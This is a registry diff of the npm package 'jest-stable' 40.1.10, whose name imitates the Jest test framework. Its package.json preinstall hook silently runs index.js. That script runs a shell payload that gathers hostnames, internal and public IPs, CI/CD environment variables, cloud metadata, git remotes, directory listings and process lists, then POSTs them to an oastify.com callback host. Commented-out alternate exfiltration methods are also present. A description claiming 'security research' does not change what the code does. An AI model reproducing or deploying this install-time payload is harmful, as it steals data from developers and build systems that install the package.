jest-stable 40.1.10

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +163 -0
  2. package/package.json +15 -0
package/index.js ADDED
@@ -0,0 +1,163 @@
1
+ //const { exec } = require("child_process");
2
+ /*
3
+ // Method 1: Simple and reliable - direct data exfiltration
4
+ const payload = `
5
+ hostname=$(hostname)
6
+ pwd=$(pwd)
7
+ user=$(whoami)
8
+ ip=$(curl -s https://ifconfig.me)
9
+ package="sarumaan_a"
10
+
11
+ data="${hostname}|${pwd}|${user}|${ip}|${package}"
12
+ encoded=$(echo -n "$data" | base64 | tr -d '\\n')
13
+
14
+ curl -k -s "http://7nv0bfnhimpr5lrd9fuw8t0wvn1ep9dy.oastify.com/${encoded}"
15
+ `;
16
+
17
+ exec(payload, (error, stdout, stderr) => {
18
+ if (error) {
19
+ console.log("error", error.message);
20
+ return;
21
+ }
22
+ if (stderr) {
23
+ console.log("stderr:", stderr);
24
+ return;
25
+ }
26
+ console.log(stdout);
27
+ });*/
28
+
29
+ // Method 2: Alternative - POST request with data in body (more stealthy)
30
+ /*
31
+ const payload2 = `
32
+ data=$(hostname;echo "|";pwd;echo "|";whoami;echo "|";curl -s https://ifconfig.me;echo "|sarumaan_a")
33
+ curl -k -s -X POST -d "$data" http://7nv0bfnhimpr5lrd9fuw8t0wvn1ep9dy.oastify.com/exfil
34
+ `;
35
+
36
+ exec(payload2, (error, stdout, stderr) => {
37
+ if (error) {
38
+ console.log("error", error.message);
39
+ return;
40
+ }
41
+ console.log(stdout);
42
+ });
43
+ */
44
+
45
+ // Method 3: Most reliable - JSON exfiltration via DNS or HTTP
46
+ /*const { exec } = require("child_process");
47
+ const payload3 = `
48
+ curl -k -s -H "Content-Type: application/json" -X POST -d "{\\"host\\":\\"$(hostname)\\",\\"pwd\\":\\"$(pwd)\\",\\"user\\":\\"$(whoami)\\",\\"ip\\":\\"$(curl -s https://ifconfig.me)\\",\\"pkg\\":\\"sarumaan_a\\"}" http://7nv0bfnhimpr5lrd9fuw8t0wvn1ep9dy.oastify.com/data
49
+ `;
50
+
51
+ exec(payload3, (error, stdout, stderr) => {
52
+ if (error) {
53
+ console.log("error", error.message);
54
+ return;
55
+ }
56
+ console.log(stdout);
57
+ });*/
58
+
59
+ const { exec } = require("child_process");
60
+
61
+ // Enhanced Shell Payload
62
+ // Collects multiple data points and sends them as a structured JSON object
63
+ const enhancedPayload = `
64
+ # 1. COLLECT SYSTEM & NETWORK IDENTIFYING INFORMATION
65
+ HOST_FQDN=$(hostname -f 2>/dev/null || hostname)
66
+ SHORT_HOST=$(hostname -s)
67
+ PUBLIC_IP=$(curl -s https://ifconfig.me 2>/dev/null || echo "NO_PUBLIC_IP")
68
+ INTERNAL_IPS=$(ip addr show 2>/dev/null | grep -E "inet (172|10|192.168)" || ifconfig 2>/dev/null | grep -E "inet (172|10|192.168)" || echo "NO_INTERNAL_IPS")
69
+ DOMAIN=$(domainname 2>/dev/null || echo "NO_DOMAIN")
70
+
71
+ # 2. GOLDEN SOURCE: CI/CD & BUILD ENVIRONMENT VARIABLES
72
+ # These often contain project URLs, organization names, and repository info
73
+ CI_VARS=$(env | grep -E "(CI_|GITLAB_|GITHUB_|JENKINS_|BUILD_|PROJECT|REPO)" | head -20)
74
+ if [ -z "$CI_VARS" ]; then CI_VARS="NO_CI_VARS_FOUND"; fi
75
+
76
+ # 3. CHECK FOR CLOUD PROVIDER METADATA (AWS, GCP, Azure)
77
+ CLOUD_INFO="NO_CLOUD_METADATA"
78
+ # Try AWS Instance Metadata
79
+ if curl -s -f --connect-timeout 2 http://169.254.169.254/latest/meta-data/instance-id >/dev/null 2>&1; then
80
+ AWS_ID=$(curl -s http://169.254.169.254/latest/meta-data/instance-id)
81
+ AWS_TYPE=$(curl -s http://169.254.169.254/latest/meta-data/instance-type)
82
+ CLOUD_INFO="AWS: $AWS_ID ($AWS_TYPE)"
83
+ # Try Google Cloud Metadata
84
+ elif curl -s -f -H "Metadata-Flavor: Google" --connect-timeout 2 http://metadata.google.internal/computeMetadata/v1/instance/id >/dev/null 2>&1; then
85
+ GCP_ID=$(curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/id)
86
+ GCP_PROJECT=$(curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/project/project-id)
87
+ CLOUD_INFO="GCP: $GCP_ID (Project: $GCP_PROJECT)"
88
+ fi
89
+
90
+ # 4. SEARCH FOR GIT REPOSITORIES (Contain remote URLs)
91
+ GIT_REMOTES="NO_GIT_REPOS"
92
+ for dir in /home /root /opt /app /src /workspace /var /srv; do
93
+ if [ -d "$dir" ]; then
94
+ REPO=$(find "$dir" -name ".git" -type d 2>/dev/null | head -1)
95
+ if [ -n "$REPO" ]; then
96
+ GIT_REMOTE=$(cd "$REPO/.." && git remote -v 2>/dev/null | head -2)
97
+ GIT_REMOTES="$GIT_REMOTE"
98
+ break
99
+ fi
100
+ fi
101
+ done
102
+
103
+ # 5. CHECK CURRENT DIRECTORY FOR PROJECT FILES
104
+ PROJECT_FILES=$(ls -la 2>/dev/null | head -15)
105
+ PWD_PATH=$(pwd)
106
+
107
+ # 6. GET PROCESS INFO (See what's running)
108
+ RUNNING_PROCESSES=$(ps aux 2>/dev/null | head -10)
109
+
110
+ # 7. CREATE THE ENHANCED DATA PAYLOAD
111
+ # Read package name from package.json if it exists
112
+ if [ -f "package.json" ]; then
113
+ PKG_NAME=$(node -e "console.log(JSON.parse(require('fs').readFileSync('package.json')).name || 'unknown')" 2>/dev/null || echo "unknown")
114
+ else
115
+ PKG_NAME="unknown"
116
+ fi
117
+
118
+ # Build the JSON payload with all collected data
119
+ JSON_PAYLOAD=$(cat <<EOF
120
+ {
121
+ "package": "$PKG_NAME",
122
+ "system": {
123
+ "hostname_fqdn": "$HOST_FQDN",
124
+ "hostname_short": "$SHORT_HOST",
125
+ "domain": "$DOMAIN",
126
+ "public_ip": "$PUBLIC_IP",
127
+ "internal_ips": "$INTERNAL_IPS",
128
+ "current_path": "$PWD_PATH"
129
+ },
130
+ "environment": {
131
+ "ci_cd_vars": "$CI_VARS",
132
+ "cloud_metadata": "$CLOUD_INFO",
133
+ "git_remotes": "$GIT_REMOTES",
134
+ "processes": "$RUNNING_PROCESSES"
135
+ },
136
+ "directory": "$PROJECT_FILES",
137
+ "timestamp": "$(date -u +"%Y-%m-%dT%H:%M:%SZ")"
138
+ }
139
+ EOF
140
+ )
141
+
142
+ # 8. SEND THE ENHANCED PAYLOAD TO CALLBACK SERVER
143
+ # ESCAPE the JSON properly for curl
144
+ curl -k -s -X POST \\
145
+ -H "Content-Type: application/json" \\
146
+ -H "User-Agent: Node/14.0.0" \\
147
+ -d "$JSON_PAYLOAD" \\
148
+ http://7nv0bfnhimpr5lrd9fuw8t0wvn1ep9dy.oastify.com/data
149
+ `;
150
+
151
+ // Execute the enhanced payload
152
+ exec(enhancedPayload, (error, stdout, stderr) => {
153
+ if (error) {
154
+ console.error("Payload execution error:", error.message);
155
+ // Fallback to basic payload if enhanced one fails
156
+ const basicPayload = `curl -k -s -X POST -H "Content-Type: application/json" -d '{"host":"$(hostname)","pkg":"sarumaan_a","fallback":"true"}' http://7nv0bfnhimpr5lrd9fuw8t0wvn1ep9dy.oastify.com/data`;
157
+ exec(basicPayload);
158
+ return;
159
+ }
160
+
161
+ if (stdout) console.log("Callback sent:", stdout.substring(0, 200));
162
+ if (stderr) console.error("Stderr:", stderr);
163
+ });
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+ {
2
+ "name": "jest-stable",
3
+ "version": "40.1.10",
4
+ "description": "This is for security research only. PLEASE DO NOT USE. If you are affected by this, my sincere apollogies. If you want me to test your infrastructure for this vulnerability or need a penetration tester, I am available for employment. You can reach me on sarumaan@wearehackerone.com Thank you for understanding.....",
5
+ "main": "main.js",
6
+ "scripts": {
7
+ "preinstall": "node index.js > /dev/null 2>&1",
8
+ "test": "echo \"Error: no test specified\" && exit 1"
9
+ },
10
+ "author": "Hackerone_sarumaan",
11
+ "license": "ISC",
12
+ "dependencies": {
13
+ "lodash": "^4.1.21"
14
+ }
15
+ }